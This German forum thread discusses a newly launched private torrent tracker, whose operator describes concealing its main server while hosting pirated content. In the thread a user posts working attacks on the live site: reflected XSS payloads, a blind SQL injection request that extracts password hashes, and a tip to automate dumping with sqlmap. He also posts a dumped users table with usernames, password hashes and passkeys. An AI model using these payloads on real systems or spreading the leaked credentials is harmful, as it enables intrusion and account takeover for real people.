gerade gesehen, hast antwort
gerade gesehen, hast antwort
Wollte mich gestern mal registrieren (dauert ja eigentlich nicht lange) um mal einen Blick drauf zu werfen. Leider wurde mir mit dem aktuellen FF (unter Linux) kein Button angezeigt um die Registrierung abzuschicken.
Unnötige Schreib/Tippfehler, wie "cloudfaire" und "clout", machen mich ziemlich nervös. Andere Leute empfinden das, gerade in einer Vorstellung, vermutlich noch deutlich negativer.
Bezüglich des Hosting: Nicht flunkern. Ihr nutzt definitiv (in welcher Weise genau kann man nur raten) auch einen Hosteurope Server. Ich würde dir definitiv davon abraten das weiter zu dementieren, denn sonst postet hier ganz schnell einer eure IP als Beweis (gefunden haben sie sicher schon einige). Auch die Domain dort zu haben ist relativ undurchdacht.
Insgesamt bin ich von diesem Projekt und der Vorstellung nicht überzeugt...
naja jedem das seine. Betreffend das Hosting ist es (so sage ich es mal) im grunde egal wo mann es macht (ausser strato). Verboten ist es bei Jedem hoster.
der unterschied ist gegenüber den anderen/meisten alt's das ich wirklich nur die source hoste und keine Files. Welches nicht verboten ist.
und das ich von hosteurope (ist ein anderer anbieter aber die server sind welche von denen) die Domain als weiterleitung zu dem Server nehme ist auch an und für sich nicht schlimm. (Schlimm währe es wenn ich auf dem host europe die source und files bzw. rtorrent ect. laufen lassen würde) aber für die paar files die ich seede bzw. der shoutcast und ts server befinden sich auf einem ovh root.
Das wenn man die url genau zurück verfolgt man einen anbieter bzw die ip von host herausbekommt ist nicht schwer. (egal wie man es verstecken möchte)
Bezüglich kein Button, kann ich nicht genau bestättigen ob es ein genereller fehler ist oder nur bei dir wegen dem Linux. (Die Seite ist für firefox @ windows programiert) andere browser gehen auch (betriebssysteme hab ich nicht getestet) unterstützen aber auch nicht alle funktionen
betr. der clout..... ich kenne keinen Großen oder szene alt der keine clout nutzt
Bezüglich des Wahrheitsgehaltes bzw. der Richtigkeit deiner Aussagen halte ich mich mal bedeckt. Eines kann ich dir allerdings versichern: Eine schlechte Wahl des Hostings oder der Domain hat durchaus das Potential einem Projekt das Genick zu brechen
ist schon richtig, aber für den anfang reicht es.
Wenn die seite mal gewisse aktivität hat, hole ich einen anderen url server und nimm die url mit. Nur sind mir da momentan umgerechnet ~20€/monat zuviel. (ca. 1,50 die domain und 18-20 der root)
Jetzt könnte man sagen warum nimmst du die url nicht einfach auf den ukraine root mit ? ganz einfach damit der haupt root wo die source läuft soweit unbekannt bleibt.
alternative könnte ich auch mit dyndns eine url erstellen und sie auf dem haupt root weiter leiten, dann währe aber die url bxp. black-universe.xyz.xy und das möchte ich nicht
so läuft das aber nicht, erst ankündigen, werben und dann direkt alles entfernen.Thema kann gelöscht werden.
Grund : project wird überarbeitet. Bei start gibt es ein neues Thema
Der Beitrag wurde wiederhergestellt und du kannst das ganze dann auch hier weiterführen.
You are offline
Try:
- Don't Panic
- Look around
- Interact with reality
phpinfo()
Warum lässt jeder diesen Kram online?
Geht doch niemanden was an, was dort drin steht...
Unter diesen Umständen werde ich mich schonmal nicht registrieren...
An der Sicherheit sollte auch noch gearbeitet werden:
Code:http://www.black-universe.li/recover.php | POST: email=TEST"><script>alert(String.fromCharCode(88,83,83));</script>
Ebenfalls gibt es die möglichkeit SQL-Befehle zu injecten!Code:https://www.black-universe.li/coverurl.php?form="><script>alert(String.fromCharCode(88,83,83));</script>
Ist die SQL-Abfrage valid so erscheint diese Meldung:
Das ganze kann man dann noch automatisiert dumpen (Vorzugsweise mit sqlmap):Code:http://www.black-universe.li/forumstake.php?action=rate | POST: topicid=4&forumid=6&postid=(SELECT(CASE WHEN(ORD(MID((SELECT IFNULL(CAST(passhash AS CHAR ),0x20) FROM neu.users ORDER BY id LIMIT 0,1),32,1))NOT BETWEEN 0 AND 51)THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS)END))&userid=31&returnto=forums.php?action=viewtopic&topicid=4&page=p4#p4&rating=3
Code:Database: neu Table: users [8 entries] +----+-----------------+----------------------------------+-------------------------+ | id | username | passhash | passkey | +----+-----------------+----------------------------------+-------------------------+ | 1 | D@rk-Ripper\x99 | ca59f625d7c9fbd505f3f069e922f054 | Û\x95ÉIzwxú | | 24 | Loyd | 7e1734c6a4dcf3534f115b98a89f655d | íÛÃ\x8dâ3\r\x89 | | 25 | Warlock | 2858ec3ddc45c1c3cdb35c06c3c8a32f | #MöÛ3\x1fW¹ | | 26 | sumfl0w | 462ccbef5dc0734dada6806e739730cb | à¸\x92\x83\x15\x1dý\x95 | | 27 | BabyRay | 3d66eaf3ec5b8bb9f3dd145c1acc6793 | i:½qI\x8dgý | | 28 | ThaPUSHer | 93b91d70047a5e48fc15427b41f83aae | ÕÛ\x16ß_Ä.m | | 29 | hddude | ae35c2f5600ea1643d6ae20c4533c0df | ÁÁmô\x7fvM\x05 | | 31 | user123 | 36f561c263e02d142667f451871a34aa | ¡k/2{<P© | +----+-----------------+----------------------------------+-------------------------+
Geändert von SecurityFlaw (29.05.2017 um 22:45 Uhr)
Du olles Scriptkiddie xD *joke*, ne machste gut!Zitat von SecurityFlaw
SzeneBox.org bei Telegram https://t.me/szenebox
Warst zu schnell, schau es dir jetzt nochmal an!
P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen
8 User xD da geht ja die Post ab ^^Warst zu schnell, schau es dir jetzt nochmal an!
P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen
SzeneBox.org bei Telegram https://t.me/szenebox
Wobei user123 mein testacc war...
Dieses Thema wurde von einem Moderator aufgrund folgender Kriterien geschlossen.
[X] Service ist Offline
[X] Keine Rückmeldung des Erstellers
[X] Aktiver Support ist nicht gewährleistet
[ ] Sonstige Gründe
Sofern nachvollziehbare Gründe vorliegen kann dieses Thema wieder geöffnet werden.
Wende dich dazu bitte an einen Moderator.
Mfg Szenebox.org Team
You are offline
Try:
- Don't Panic
- Look around
- Interact with reality
Berechtigungen
SzeneBox.org... im Mittelpunkt der Szene!© since 2015 szeneBOX.org - All Rights ReservedDomains: www.szenebox.org |
